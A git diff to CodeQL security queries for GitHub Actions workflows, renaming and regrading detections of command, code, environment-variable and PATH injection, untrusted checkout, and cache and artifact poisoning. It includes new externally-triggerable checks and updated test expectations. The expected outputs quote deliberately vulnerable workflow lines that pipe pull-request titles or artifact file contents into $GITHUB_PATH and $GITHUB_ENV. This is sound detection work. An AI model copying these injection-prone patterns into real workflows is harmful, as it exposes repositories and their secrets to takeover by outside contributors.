DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "test.yml" + source.getLocation().getFile().getBaseName() = "non-existant-test.yml" } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql similarity index 74% rename from ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql rename to ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index a25473fd812..fc96c3d4353 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -4,8 +4,8 @@ * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-envpath-injection + * @precision very-high + * @id actions/envpath-injection/critical * @tags actions * security * external/cwe/cwe-077 @@ -19,14 +19,17 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and - // sink belongs to a privileged job - sink.getNode().asExpr().getEnclosingJob().isPrivileged() and ( - not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + inPrivilegedCompositeAction(sink.getNode().asExpr()) or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) + ) and + ( source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and sink.getNode() instanceof EnvPathInjectionFromFileReadSink + or + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" ) select sink.getNode(), source, sink, - "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.", + "Potential PATH environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql similarity index 78% rename from ql/src/Security/CWE-077/EnvPathInjection.ql rename to ql/src/Security/CWE-077/EnvPathInjectionMedium.ql index 80d1729b267..cc067598c89 100644 --- a/ql/src/Security/CWE-077/EnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.ql @@ -5,7 +5,7 @@ * @problem.severity warning * @security-severity 5.0 * @precision high - * @id actions/envpath-injection + * @id actions/envpath-injection/medium * @tags actions * security * external/cwe/cwe-077 @@ -20,14 +20,9 @@ from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and ( - // sink belongs to a composite action - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - // sink belongs to a non-privileged job - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) and + inNonPrivilegedJob(sink.getNode().asExpr()) and ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" or diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql similarity index 77% rename from ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql rename to ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 5311d9a4de8..4b0799ca441 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -4,8 +4,8 @@ * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-envvar-injection + * @precision very-high + * @id actions/envvar-injection/critical * @tags actions * security * external/cwe/cwe-077 @@ -28,10 +28,13 @@ predicate artifactToFileRead(DataFlow::Node source, DataFlow::Node sink) { from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - // sink belongs to a privileged job - sink.getNode().asExpr().getEnclosingJob().isPrivileged() and + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) + ) and // exclude paths to file read sinks from non-artifact sources artifactToFileRead(source.getNode(), sink.getNode()) select sink.getNode(), source, sink, - "Potential privileged environment variable injection in $@, which may be controlled by an external user.", + "Potential environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql similarity index 80% rename from ql/src/Security/CWE-077/EnvVarInjection.ql rename to ql/src/Security/CWE-077/EnvVarInjectionMedium.ql index 8c251095457..7eb239e83a0 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.ql @@ -5,7 +5,7 @@ * @problem.severity warning * @security-severity 5.0 * @precision high - * @id actions/envvar-injection + * @id actions/envvar-injection/medium * @tags actions * security * external/cwe/cwe-077 @@ -29,14 +29,9 @@ from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and ( - // sink belongs to a composite action - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or - // sink belongs to a non-privileged job - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) and + inNonPrivilegedJob(sink.getNode().asExpr()) and // exclude paths to file read sinks from non-artifact sources artifactToFileRead(source.getNode(), sink.getNode()) ) diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql similarity index 59% rename from ql/src/Security/CWE-078/PrivilegedCommandInjection.ql rename to ql/src/Security/CWE-078/CommandInjectionCritical.ql index adb8f25f077..2c2ab2f2af5 100644 --- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -1,12 +1,12 @@ /** - * @name Command built from user-controlled sources on a privileged context + * @name Command built from user-controlled sources * @description Building a system command from user-controlled sources is vulnerable to insertion of * malicious code by the user. * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-command-injection + * @precision very-high + * @id actions/command-injection/critical * @tags actions * security * external/cwe/cwe-078 @@ -19,10 +19,11 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, - "Potential privileged command injection in $@, which may be controlled by an external user.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() + "Potential command injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjectionMedium.ql similarity index 79% rename from ql/src/Security/CWE-078/CommandInjection.ql rename to ql/src/Security/CWE-078/CommandInjectionMedium.ql index 6ac15f83207..072ebbc8dce 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjectionMedium.ql @@ -6,7 +6,7 @@ * @problem.severity warning * @security-severity 5.0 * @precision high - * @id actions/command-injection + * @id actions/command-injection/medium * @tags actions * security * external/cwe/cwe-078 @@ -20,12 +20,8 @@ from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and ( - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) - or - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or + inNonPrivilegedJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql similarity index 68% rename from ql/src/Security/CWE-094/PrivilegedCodeInjection.ql rename to ql/src/Security/CWE-094/CodeInjectionCritical.ql index d043bd930b6..7e14825a295 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -1,12 +1,12 @@ /** - * @name Code injection on a privileged context + * @name Code injection * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary * code execution. * @kind path-problem * @problem.severity error * @security-severity 9 - * @precision high - * @id actions/privileged-code-injection + * @precision very-high + * @id actions/code-injection/critical * @tags actions * security * external/cwe/cwe-094 @@ -21,10 +21,11 @@ import CodeInjectionFlow::PathGraph from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, - "Potential privileged code injection in $@, which may be controlled by an external user.", sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql similarity index 77% rename from ql/src/Security/CWE-094/CodeInjection.ql rename to ql/src/Security/CWE-094/CodeInjectionMedium.ql index aa5bbfdf75a..7599ef8847b 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -5,8 +5,8 @@ * @kind path-problem * @problem.severity warning * @security-severity 5.0 - * @precision high - * @id actions/code-injection + * @precision medium + * @id actions/code-injection/medium * @tags actions * security * external/cwe/cwe-094 @@ -22,12 +22,8 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and ( - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) - or - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or + inNonPrivilegedJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 0250d9aada1..80ebd92c5d3 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -18,22 +18,24 @@ import codeql.actions.security.PoisonableSteps from LocalJob j, PRHeadCheckoutStep checkout, Step s where - // The workflow runs in the context of the default branch + // the workflow runs in the context of the default branch runsOnDefaultBranch(j) and - // The job checkouts untrusted code from a pull request + // the job checkouts untrusted code from a pull request // TODO: Consider adding artifact downloads as a potential source of cache poisoning j.getAStep() = checkout and + // job can be triggered by an external user + j.isExternallyTriggerable() and ( - // The job writes to the cache + // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) j.getAStep() = s and s instanceof CacheWritingStep or - // The job executes checked-out code + // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() = s and s instanceof PoisonableStep and - // Excluding privileged workflows since they can be easily exploited in similar circumstances + // excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() ) select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s, diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 5d739d746d5..1c13497ddaf 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -21,7 +21,9 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Local where CodeInjectionFlow::flowPath(source, sink) and j = sink.getNode().asExpr().getEnclosingJob() and - // Excluding privileged workflows since they can be easily exploited in similar circumstances + // job can be triggered by an external user + j.isExternallyTriggerable() and + // excluding privileged workflows since they can be easily exploited in similar circumstances not j.isPrivileged() and // The workflow runs in the context of the default branch runsOnDefaultBranch(j) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 6b3e0628f40..2144db7afa0 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -17,6 +17,8 @@ import codeql.actions.security.PoisonableSteps from ControlCheck check, MutableRefCheckoutStep checkout where + // the job can be triggered by an external user + check.getEnclosingJob().isExternallyTriggerable() and // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // the checked-out code may lead to arbitrary code execution @@ -25,7 +27,7 @@ where // label gates do not depend on the triggering event check instanceof LabelControlCheck or - // actor or Association gates apply to IssueOps only + // actor or association gates apply to IssueOps only (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index fcf83269960..11dfa7fc567 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -17,6 +17,8 @@ import codeql.actions.security.PoisonableSteps from ControlCheck check, MutableRefCheckoutStep checkout where + // the job can be triggered by an external user + check.getEnclosingJob().isExternallyTriggerable() and // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // there are no evidences that the checked-out code can lead to arbitrary code execution diff --git a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql similarity index 64% rename from ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql rename to ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql index 379babf35f8..a7d2518564d 100644 --- a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql @@ -3,9 +3,9 @@ * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. * @kind path-problem * @problem.severity error - * @precision high + * @precision very-high * @security-severity 9 - * @id actions/privileged-artifact-poisoning + * @id actions/artifact-poisoning/critical * @tags actions * security * external/cwe/cwe-829 @@ -18,10 +18,11 @@ import ArtifactPoisoningFlow::PathGraph from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - j.isPrivileged() + ( + inPrivilegedCompositeAction(sink.getNode().asExpr()) + or + inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, - "Potential privileged artifact poisoning in $@, which may be controlled by an external user.", - sink, sink.getNode().toString() + "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, + sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql similarity index 77% rename from ql/src/Security/CWE-829/ArtifactPoisoning.ql rename to ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql index c26862960d1..a4fb958b7f9 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql @@ -5,7 +5,7 @@ * @problem.severity warning * @precision high * @security-severity 5.0 - * @id actions/artifact-poisoning + * @id actions/artifact-poisoning/medium * @tags actions * security * external/cwe/cwe-829 @@ -19,12 +19,8 @@ from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sin where ArtifactPoisoningFlow::flowPath(source, sink) and ( - exists(sink.getNode().asExpr().getEnclosingCompositeAction()) - or - exists(Job j | - j = sink.getNode().asExpr().getEnclosingJob() and - not j.isPrivileged() - ) + inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or + inNonPrivilegedJob(sink.getNode().asExpr()) ) select sink.getNode(), source, sink, "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql similarity index 85% rename from ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql rename to ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 1181cd1e755..0a597ee3fa4 100644 --- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -5,9 +5,9 @@ * that is able to push to the base repository and to access secrets. * @kind problem * @problem.severity error - * @precision high + * @precision very-high * @security-severity 9.3 - * @id actions/privileged-untrusted-checkout/critical + * @id actions/untrusted-checkout/critical * @tags actions * security * external/cwe/cwe-829 @@ -20,10 +20,14 @@ import codeql.actions.security.PoisonableSteps from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and - j.isPrivileged() and j.getAStep() = checkout and checkout.getAFollowingStep() instanceof PoisonableStep and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check + ) and + ( + inPrivilegedCompositeAction(checkout) + or + inPrivilegedExternallyTriggerableJob(checkout) ) select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql similarity index 87% rename from ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql rename to ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index bf2cf129fbf..29a15accdf2 100644 --- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -7,7 +7,7 @@ * @problem.severity warning * @precision medium * @security-severity 5.3 - * @id actions/privileged-untrusted-checkout/high + * @id actions/untrusted-checkout/high * @tags actions * security * external/cwe/cwe-829 @@ -20,10 +20,14 @@ import codeql.actions.security.PoisonableSteps from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and - j.isPrivileged() and j.getAStep() = checkout and not checkout.getAFollowingStep() instanceof PoisonableStep and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check + ) and + ( + inPrivilegedCompositeAction(checkout) + or + inPrivilegedExternallyTriggerableJob(checkout) ) select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql new file mode 100644 index 00000000000..aa62a88935b --- /dev/null +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -0,0 +1,31 @@ +/** + * @name Checkout of untrusted code in trusted context + * @description Priveleged workflows have read/write access to the base repository and access to secrets. + * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment + * that is able to push to the base repository and to access secrets. + * @kind problem + * @problem.severity warning + * @precision medium + * @security-severity 5.0 + * @id actions/untrusted-checkout/medium + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps + +from LocalJob j, PRHeadCheckoutStep checkout +where + j = checkout.getEnclosingJob() and + j.getAStep() = checkout and + not exists(ControlCheck check | + checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check + ) and + ( + inNonPrivilegedCompositeAction(checkout) or + inNonPrivilegedJob(checkout) + ) +select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 5f4218cacfe..bedd03e2239 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -1,5 +1,5 @@ import codeql.actions.Ast -import codeql.actions.Ast::Utils as Utils +import codeql.actions.Helper import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow import codeql.Locations @@ -69,7 +69,7 @@ query string testNormalizeExpr(string s) { "github.event.pull_request.user['login']", "github.event.pull_request.user[\"login\"]", "github.event.pull_request['user']['login']", "foo['bar'] == baz" ] and - result = Utils::normalizeExpr(s) + result = normalizeExpr(s) } query predicate writeToGitHubEnv(string key, string value) { @@ -82,7 +82,7 @@ query predicate writeToGitHubEnv(string key, string value) { "echo 'sha2=$(> $GITHUB_ENV", "echo sha3=$(> $GITHUB_ENV", ] and - Utils::extractLineAssignment(t, "ENV", key, value) + extractLineAssignment(t, "ENV", key, value) ) } @@ -100,6 +100,6 @@ query predicate writeToGitHubOutput(string key, string value) { "echo sha5=$(> ${GITHUB_OUTPUT}", "echo sha6=$(> \"${GITHUB_OUTPUT}\"", ] and - Utils::extractLineAssignment(t, "OUTPUT", key, value) + extractLineAssignment(t, "OUTPUT", key, value) ) } diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref deleted file mode 100644 index ab36454942e..00000000000 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/EnvPathInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected similarity index 71% rename from ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index af4b70d3a60..c6091f1fc23 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected @@ -18,8 +18,8 @@ nodes | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths #select -| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref new file mode 100644 index 00000000000..80f72124fe4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvPathInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref new file mode 100644 index 00000000000..165a3d20896 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvPathInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref deleted file mode 100644 index dafc2b38fc4..00000000000 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/EnvVarInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected similarity index 71% rename from ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 8c9d923bd35..369085708a0 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -35,14 +35,14 @@ nodes | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths #select -| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho 